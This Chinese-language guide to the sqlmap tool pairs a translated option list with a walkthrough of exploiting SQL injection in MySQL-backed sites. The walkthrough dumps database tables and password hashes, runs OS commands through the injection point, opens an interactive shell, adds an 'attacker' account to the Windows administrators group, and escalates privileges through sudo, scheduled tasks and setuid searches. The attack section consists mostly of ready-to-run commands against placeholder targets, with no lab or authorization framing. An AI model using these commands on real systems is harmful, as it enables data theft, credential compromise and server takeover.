内容目录

1.基本命令

使用方法: sqlmap.py [选项]

选项:

-h, --help 显示基本帮助信息并退出

-hh 显示高级帮助信息并退出

--version 显示程序版本号并退出

-v VERBOSE 设置详细级别：0-6（默认为1）

目标:

至少需要提供以下一个选项来定义目标

-u URL, --url=URL 目标URL（例如："http://www.site.com/vuln.php?id=1"）

-d DIRECT 用于直接数据库连接的连接字符串

-l LOGFILE 从Burp或WebScarab代理日志文件解析目标

-m BULKFILE 从文本文件中读取多个目标进行扫描

-r REQUESTFILE 从文件加载HTTP请求

-g GOOGLEDORK 将Google dork结果作为目标URL处理

-c CONFIGFILE 从配置INI文件加载选项

请求:

这些选项可以用来指定如何连接到目标URL

-A AGENT, --user.. HTTP User-Agent头的值

-H HEADER, --hea.. 额外的头部（例如："X-Forwarded-For: 127.0.0.1"）

--method=METHOD 强制使用给定的HTTP方法（例如PUT）

--data=DATA 通过POST发送的数据字符串（例如："id=1"）

--param-del=PARA.. 用于分割参数值的字符（例如&）

--cookie=COOKIE HTTP Cookie头部的值（例如："PHPSESSID=a8d127e.."）

--cookie-del=COO.. 用于分割Cookie值的字符（例如;）

--live-cookies=L.. 加载最新值的实时Cookies文件

--load-cookies=L.. 包含Netscape/wget格式Cookies的文件

--drop-set-cookie 忽略响应中的Set-Cookie头部

--mobile 通过HTTP User-Agent头部模拟智能手机

--random-agent 使用随机选择的HTTP User-Agent头部值

--host=HOST HTTP Host头部的值

--referer=REFERER HTTP Referer头部的值

--headers=HEADERS 额外的头部（例如："Accept-Language: fr\nETag: 123"）

--auth-type=AUTH.. HTTP认证类型（Basic, Digest, Bearer等）

--auth-cred=AUTH.. HTTP认证凭据（用户名:密码）

--auth-file=AUTH.. HTTP认证PEM证书/私钥文件

--abort-code=ABO.. 在特定HTTP错误代码时终止（例如401）

--ignore-code=IG.. 忽略特定HTTP错误代码（例如401）

--ignore-proxy 忽略系统默认代理设置

--ignore-redirects 忽略重定向尝试

--ignore-timeouts 忽略连接超时

--proxy=PROXY 使用代理连接到目标URL

--proxy-cred=PRO.. 代理认证凭据（用户名:密码）

--proxy-file=PRO.. 从文件加载代理列表

--proxy-freq=PRO.. 每隔多少次请求更换一次来自给定列表的代理

--tor 使用Tor匿名网络

--tor-port=TORPORT 设置不同于默认的Tor代理端口

--tor-type=TORTYPE 设置Tor代理类型（HTTP, SOCKS4或SOCKS5，默认）

--check-tor 检查是否正确使用了Tor

--delay=DELAY 每个HTTP请求之间的延迟秒数

--timeout=TIMEOUT 连接超时等待秒数（默认30秒）

--retries=RETRIES 当连接超时时重试次数（默认3次）

--retry-on=RETRYON 当内容匹配正则表达式时重试请求（例如"drop"）

--randomize=RPARAM 随机更改给定参数的值

--safe-url=SAFEURL 测试期间频繁访问的安全URL地址

--safe-post=SAFE.. 发送到安全URL的POST数据

--safe-req=SAFER.. 从文件加载安全HTTP请求

--safe-freq=SAFE.. 访问安全URL之间定期发送的请求

--skip-urlencode 跳过有效负载数据的URL编码

--csrf-token=CSR.. 用于保存反CSRF令牌的参数

--csrf-url=CSRFURL 提取反CSRF令牌的URL地址

--csrf-method=CS.. 反CSRF令牌页面访问期间使用的HTTP方法

--csrf-data=CSRF.. 反CSRF令牌页面访问期间发送的POST数据

--csrf-retries=C.. 反CSRF令牌检索重试次数（默认0）

--force-ssl 强制使用SSL/HTTPS

--chunked 使用HTTP分块传输编码（POST）请求

--hpp 使用HTTP参数污染方法

--eval=EVALCODE 在请求之前评估提供的Python代码（例如："import hashlib;id2=hashlib.md5(id).hexdigest()"）

优化:

这些选项可以用来优化sqlmap的性能

-o 打开所有优化开关

--predict-output 预测常见查询输出

--keep-alive 使用持久HTTP(s)连接

--null-connection 不实际获取HTTP响应体的情况下获取页面长度

--threads=THREADS 最大并发HTTP(s)请求数量（默认为1）

注入:

这些选项可以用来指定测试哪些参数，提供自定义注入有效负载和可选篡改脚本

-p TESTPARAMETER 可测试的参数

--skip=SKIP 跳过给定参数的测试

--skip-static 跳过看似静态的参数测试

--param-exclude=.. 排除测试参数的正则表达式（例如"ses"）

--param-filter=P.. 按位置选择可测试参数（例如"POST"）

--dbms=DBMS 强制后端DBMS使用提供的值

--dbms-cred=DBMS.. DBMS认证凭据（用户:密码）

--os=OS 强制后端DBMS操作系统使用提供的值

--invalid-bignum 使用大数字使值无效

--invalid-logical 使用逻辑运算使值无效

--invalid-string 使用随机字符串使值无效

--no-cast 关闭有效负载转换机制

--no-escape 关闭字符串转义机制

--prefix=PREFIX 注入有效负载前缀字符串

--suffix=SUFFIX 注入有效负载后缀字符串

--tamper=TAMPER 使用给定脚本篡改注入数据

检测:

这些选项可以用来定制检测阶段

--level=LEVEL 执行测试的级别（1-5，默认为1）

--risk=RISK 执行测试的风险级别（1-3，默认为1）

--string=STRING 查询评估为真时匹配的字符串

--not-string=NOT.. 查询评估为假时匹配的字符串

--regexp=REGEXP 查询评估为真时匹配的正则表达式

--code=CODE 查询评估为真时匹配的HTTP代码

--smart 如果启发式分析结果为正，则执行彻底测试

--text-only 仅基于文本内容比较页面

--titles 仅基于标题比较页面

技术:

这些选项可以用来调整特定SQL注入技术的测试

--technique=TECH.. 使用的SQL注入技术（默认"BEUSTQ"）

--time-sec=TIMESEC 延迟DBMS响应的秒数（默认5秒）

--union-cols=UCOLS 用于测试UNION查询SQL注入的列范围

--union-char=UCHAR 用于暴力破解列数的字符

--union-from=UFROM UNION查询SQL注入中FROM部分使用的表

--union-values=U.. UNION查询SQL注入中使用的列值

--dns-domain=DNS.. 用于DNS渗漏攻击的域名

--second-url=SEC.. 搜索二级响应的结果页面URL

--second-req=SEC.. 从文件加载二级HTTP请求

指纹识别:

-f, --fingerprint 执行广泛的DBMS版本指纹识别

枚举:

这些选项可以用来枚举后端数据库管理系统的信息、结构和表格中包含的数据

-a, --all 获取所有信息

-b, --banner 获取DBMS标识信息

--current-user 获取当前DBMS用户

--current-db 获取当前DBMS数据库

--hostname 获取DBMS服务器主机名

--is-dba 检测当前DBMS用户是否为DBA

--users 枚举DBMS用户

--passwords 枚举DBMS用户的密码哈希

--privileges 枚举DBMS用户的权限

--roles 枚举DBMS用户的角色

--dbs 枚举DBMS数据库

--tables 枚举DBMS数据库表格

--columns 枚举DBMS数据库表格列

--schema 枚举DBMS模式

--count 获取表格的条目数量

--dump 导出DBMS数据库表格条目

--dump-all 导出所有DBMS数据库表格条目

--search 搜索列、表和/或数据库名称

--comments 枚举过程中检查DBMS注释

--statements 获取在DBMS上运行的SQL语句

-D DB 枚举的DBMS数据库

-T TBL 枚举的DBMS数据库表

-C COL 枚举的DBMS数据库表格列

-X EXCLUDE 不枚举的DBMS数据库标识符

-U USER 枚举的DBMS用户

--exclude-sysdbs 枚举表格时排除DBMS系统数据库

--pivot-column=P.. 枢纽列名称

--where=DUMPWHERE 表格导出时使用WHERE条件

--start=LIMITSTART 获取的第一个导出表格条目

--stop=LIMITSTOP 获取的最后一个导出表格条目

--first=FIRSTCHAR 获取查询输出单词的第一个字符

--last=LASTCHAR 获取查询输出单词的最后一个字符

--sql-query=SQLQ.. 要执行的SQL语句

--sql-shell 提示进入交互式SQL shell

--sql-file=SQLFILE 执行来自给定文件的SQL语句

穷举:

这些选项可以用来运行穷举检查

--common-tables 检查常见表的存在

--common-columns 检查常见列的存在

--common-tables 检查常见表是否存在

--common-columns 检查常见列是否存在

--common-files 检查常见文件是否存在

用户自定义函数注入:

这些选项可以用来创建自定义用户定义的函数

--udf-inject 注入自定义用户定义的函数

--shared-lib=SHLIB 共享库的本地路径

文件系统访问:

这些选项可以用来访问后端数据库管理系统底层的文件系统

--file-read=FILE.. 从后端DBMS文件系统读取文件

--file-write=FIL.. 在后端DBMS文件系统上写入本地文件

--file-dest=FILE.. 写入到后端DBMS文件系统的绝对路径

操作系统访问:

这些选项可以用来访问后端数据库管理系统底层的操作系统

--os-cmd=OSCMD 执行操作系统命令

--os-shell 提示进入交互式操作系统shell

--os-pwn 提示获取带外（OOB）shell、Meterpreter或VNC

--os-smbrelay 单击提示获取带外（OOB）shell、Meterpreter或VNC

--os-bof 存储过程缓冲区溢出利用

--priv-esc 数据库进程用户权限提升

--msf-path=MSFPATH Metasploit Framework安装的本地路径

--tmp-path=TMPPATH 远程临时文件目录的绝对路径

Windows 注册表访问:

这些选项可以用来访问后端数据库管理系统的Windows注册表

--reg-read 读取Windows注册表键值

--reg-add 写入Windows注册表键值数据

--reg-del 删除Windows注册表键值

--reg-key=REGKEY Windows注册表键

--reg-value=REGVAL Windows注册表键值

--reg-data=REGDATA Windows注册表键值数据

--reg-type=REGTYPE Windows注册表键值类型

常规:

这些选项可以用来设置一些通用的工作参数

-s SESSIONFILE 从存储的(.sqlite)文件加载会话

-t TRAFFICFILE 将所有HTTP流量记录到文本文件中

--abort-on-empty 在结果为空时终止数据检索

--answers=ANSWERS 设置预定义的答案（例如"quit=N,follow=N"）

--base64=BASE64P.. 包含Base64编码数据的参数

--base64-safe 使用URL和文件名安全的Base64字母表（RFC 4648）

--batch 从不询问用户输入，使用默认行为

--binary-fields=.. 结果字段具有二进制值（例如"digest"）

--check-internet 在评估目标之前检查互联网连接

--cleanup 清理sqlmap特定的UDF和表格以清除DBMS

--crawl=CRAWLDEPTH 从目标URL开始爬取网站

--crawl-exclude=.. 排除页面爬取的正则表达式（例如"logout"）

--csv-del=CSVDEL CSV输出中使用的分隔字符（默认","）

--charset=CHARSET 盲注SQL注入字符集（例如"0123456789abcdef"）

--dump-file=DUMP.. 将转储的数据存储到自定义文件

--dump-format=DU.. 转储数据格式（CSV（默认）、HTML或SQLITE）

--encoding=ENCOD.. 数据检索中使用的字符编码（例如GBK）

--eta 显示每个输出的预计到达时间

--flush-session 刷新当前目标的会话文件

--forms 解析并测试目标URL上的表单

--fresh-queries 忽略会话文件中存储的查询结果

--gpage=GOOGLEPAGE 使用来自指定页码的Google dork结果

--har=HARFILE 将所有HTTP流量记录到HAR文件中

--hex 在数据检索期间使用十六进制转换

--output-dir=OUT.. 自定义输出目录路径

--parse-errors 解析并显示响应中的DBMS错误消息

--preprocess=PRE.. 使用给定脚本进行预处理（请求）

--postprocess=PO.. 使用给定脚本进行后处理（响应）

--repair 重新转储带有未知字符标记（？）的条目

--save=SAVECONFIG 将选项保存到配置INI文件

--scope=SCOPE 用于过滤目标的正则表达式

--skip-heuristics 跳过漏洞的启发式检测

--skip-waf 跳过WAF/IPS保护的启发式检测

--table-prefix=T.. 临时表使用的前缀（默认："sqlmap"）

--test-filter=TE.. 根据有效负载和/或标题选择测试（例如ROW）

--test-skip=TEST.. 根据有效负载和/或标题跳过测试（例如BENCHMARK）

--time-limit=TIM.. 以秒为单位的时间限制运行（例如3600）

--unsafe-naming 禁用DBMS标识符的转义（例如"user"）

--web-root=WEBROOT Web服务器文档根目录（例如"/var/www"）

其他:

这些选项不属于任何其他类别

-z MNEMONICS 使用简短助记符（例如"flu,bat,ban,tec=EU"）

--alert=ALERT 当发现SQL注入时运行主机OS命令

--beep 在问题和/或发现漏洞时发出蜂鸣声

--dependencies 检查缺失的（可选）sqlmap依赖项

--disable-coloring 禁用控制台输出着色

--disable-hashing 禁用表转储时的哈希分析

--list-tampers 显示可用篡改脚本列表

--no-logging 禁用日志记录到文件

--offline 离线模式工作（仅使用会话数据）

--purge 安全地移除sqlmap数据目录中的所有内容

--results-file=R.. 多个目标模式下CSV结果文件的位置

--shell 提示进入交互式sqlmap shell

--tmp-dir=TMPDIR 用于存储临时文件的本地目录

--unstable 调整不稳定连接的选项

--update 更新sqlmap

--wizard 面向初学者用户的简单向导界面

2.MySQL 数据库利用

1. 确认目标是否存在 SQL 注入漏洞

sqlmap -u "http://example.com/page?id=1"\--batch --dbs

-u：指定 URL，注入点。

--batch：自动回答所有提示（适合批处理模式）。

--dbs：列出数据库的名称。

如果该 URL 存在 SQL 注入漏洞，sqlmap 会列出目标数据库中的所有数据库。

2. 列出数据库中的表

sqlmap -u "http://example.com/page?id=1"\--batch -D database_name --tables

-D：指定要查看表的数据库名称。

--tables：列出指定数据库中的所有表。

3. 查看表列名

可以通过--schema获取该数据库的所有列名或者某个数据库表的列名--columns

sqlmap -u "http://example.com/page?id=1"\--batch -D database_name -T table_name --columns

sqlmap -u "http://example.com/page?id=1"\--batch -D database_name --columns

sqlmap -u "http://example.com/page?id=1"\--batch -D database_name --schema

4. 导出数据

当知道了表结构之后，可以使用 sqlmap 导出表中的数据。可以选择导出所有数据或按条件导出特定数据。

（1）导出整个表的内容

sqlmap -u "http://example.com/page?id=1"\--batch -D database_name -T table_name --dump

--dump：导出指定表中的所有数据。

（2）导出特定列的数据（可选）

sqlmap -u "http://example.com/page?id=1"\--batch -D database_name -T table_name -C "column1,column2" --dump

-C：指定要导出的列（以逗号分隔）。

（3）将数据导出到文件

默认情况下，sqlmap 会将导出的数据保存到 output 目录中的文件。可以指定输出目录或文件名，使用 --output-dir 选项：

sqlmap -u "http://example.com/page?id=1"\--batch -D database_name -T table_name --dump --output-dir="/path/to/directory"

5. 使用其他选项优化导出过程

指定数据格式：可以指定导出的数据格式为 CSV 或 XML 格式。使用 --csv 或 --xml 参数来改变输出格式。

sqlmap -u "http://example.com/page?id=1"\--batch -D database_name -T table_name --dump --csv

过滤数据：如果不想导出整个表的数据，可以通过 --where 选项添加条件，过滤要导出的数据。

sqlmap -u "http://example.com/page?id=1"\--batch -D database_name -T table_name --dump --where="id > 1000"

6. 分批次导出

如果数据表非常大，导出过程可能会比较长，这时你可以选择分批导出，或者利用 --start 和 --stop 参数进行分页导出。

sqlmap -u "http://example.com/page?id=1"\--batch -D database_name -T table_name --dump --start=0 --stop=100

--start：指定从哪一行开始导出数据。

--stop：指定导出多少行数据。

7.快速导出

sqlmap -u "http://example.com/page?id=1"\--batch -D database_name -T table_name --dump --where "id >1 and id<10000"

sqlmap -u "http://example.com/page?id=1"\--batch -D database_name -T table_name --dump --where "id between 1 and 10000"

8.批量导出多个表格的数据

sqlmap还支持批量导出多个表格的数据，可以通过一次性指定多个表格。例如：

sqlmap -u "http://example.com/vulnerable.php?id=1"\-D mydatabase -T users,orders,products --dump

这将导出 mydatabase 数据库中 users、orders 和 products 表格的所有数据。

9.使用其他高级选项

（1）并发线程

sqlmap还提供了许多高级选项，可以根据需要进行配置。例如，可以使用 --threads 参数指定并发线程数，以加快数据导出速度：

sqlmap -u "http://example.com/vulnerable.php?id=1"\-D mydatabase -T users --dump --threads=5

这将使用5个并发线程进行数据导出。

（2）导出数据时的错误处理

在导出数据过程中，可能会遇到各种错误。例如，网络中断、服务器防火墙限制等。可以使用 --retries 参数指定重试次数，以提高数据导出的成功率：

sqlmap -u "http://example.com/vulnerable.php?id=1"\-D mydatabase -T users --dump --retries=3

这将尝试3次重试，以应对临时性的网络问题。

（3）复杂情况下的导出

python sqlmap.py -r t.txt --technique=U --union-cols=11 --union-char=X --dbms=mysql --tamper=custmo --suffix=# -D t --batch --dump -T tz --where="id>0" --random-agent

![图片](data:image/svg+xml,%3C%3Fxml version='1.0' encoding='UTF-8'%3F%3E%3Csvg width='1px' height='1px' viewBox='0 0 1 1' version='1.1' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink'%3E%3Ctitle%3E%3C/title%3E%3Cg stroke='none' stroke-width='1' fill='none' fill-rule='evenodd' fill-opacity='0'%3E%3Cg transform='translate(-249.000000, -126.000000)' fill='%23FFFFFF'%3E%3Crect x='249' y='126' width='1' height='1'%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E)

（4）MySQL数据库用户及密码获取

sqlmap -u "http://example.com/page?id=1"\--batch --users --passwords

3.MySQL 提权

1. 测试是否可以执行操作系统命令

通过 sqlmap 可以测试目标是否能够执行系统命令。执行以下命令，测试是否可以执行操作系统命令：

python sqlmap.py -u "http://target.com/vulnerable\_page?id=1"\--os-cmd "whoami"

--os-cmd：执行操作系统命令（Linux 和 Windows 环境都适用）。

如果命令成功返回，说明数据库账户有执行系统命令的权限，进一步提权变得可能。

2.提权操作

一旦确定可以执行操作系统命令，可以尝试通过 SQL 注入利用数据库账户执行更高权限的命令（例如，创建新的管理员用户、提权等）。

（1）Linux 提权：可以尝试执行以下命令：

python sqlmap.py -u "http://target.com/vulnerable\_page?id=1"\--os-cmd "id"

python sqlmap.py -u "http://target.com/vulnerable\_page?id=1"\--os-cmd "whoami"

python sqlmap.py -u "http://target.com/vulnerable\_page?id=1"\--os-cmd "sudo whoami" # 如果数据库用户有 sudo 权限

python sqlmap.py -u "http://target.com/vulnerable\_page?id=1"\--os-cmd "touch /tmp/evil_file" # 创建恶意文件

（2）Windows 提权

python sqlmap.py -u "http://target.com/vulnerable\_page?id=1"\--os-cmd "whoami"

python sqlmap.py -u "http://target.com/vulnerable\_page?id=1"\--os-cmd "dir C:\\Windows\\System32"

python sqlmap.py -u "http://target.com/vulnerable\_page?id=1"\--os-cmd "net user" # 列出 Windows 用户

python sqlmap.py -u "http://target.com/vulnerable\_page?id=1"\--os-cmd "net localgroup administrators" # 列出管理员组成员

（3）提升为管理员权限

如果数据库用户有足够权限，可以尝试提升自己的权限。例如，在 Linux 上可以通过以下命令来获取 root 权限：

python sqlmap.py -u "http://target.com/vulnerable\_page?id=1"\--os-cmd "sudo bash"

在 Windows 上，如果数据库用户有足够权限，可能会执行以下命令来获得管理员权限：

python sqlmap.py -u "http://target.com/vulnerable\_page?id=1"\--os-cmd "net user attacker YourPassword /add"

python sqlmap.py -u "http://target.com/vulnerable\_page?id=1"\--os-cmd "net localgroup administrators attacker /add"

3.上传 Web Shell

如果数据库支持文件存储（例如文件路径在数据库中），可以通过 SQL 注入上传 Web shell，并通过 Web shell 进行操作系统级别的提权：

python sqlmap.py -u "http://target.com/vulnerable\_page?id=1"\--os-shell

这将启动一个交互式 shell，使你能够与操作系统直接交互并执行命令。

4. 针对 Windows 环境的具体提权技巧

利用 Windows 的计划任务：如果 SQL 注入用户有权限添加计划任务，可以通过以下方式创建一个新任务，该任务运行一个恶意脚本或可执行文件。

python sqlmap.py -u "http://target.com/vulnerable\_page?id=1"\--os-cmd "schtasks /create /sc once /tn 'attacker_task' /tr 'cmd.exe /c echo hello > C:\\Windows\\Temp\\attack.txt' /st 00:00"

5. 针对 Linux 环境的具体提权技巧

利用 sudo：如果数据库用户有执行 sudo 的权限，可以尝试使用 sudo 执行 root 权限命令：

python sqlmap.py -u "http://target.com/vulnerable\_page?id=1"\--os-cmd "sudo bash"

利用 Cron 作业：如果攻击者可以创建新的 cron 作业，可以将恶意脚本添加到 cron 中，以便在目标系统上定期运行。

利用 setuid 程序：攻击者可以查找具有 setuid 权限的程序，并通过这些程序提权。

python sqlmap.py -u "http://target.com/vulnerable\_page?id=1"\--os-cmd "find / -type f -perm -04000"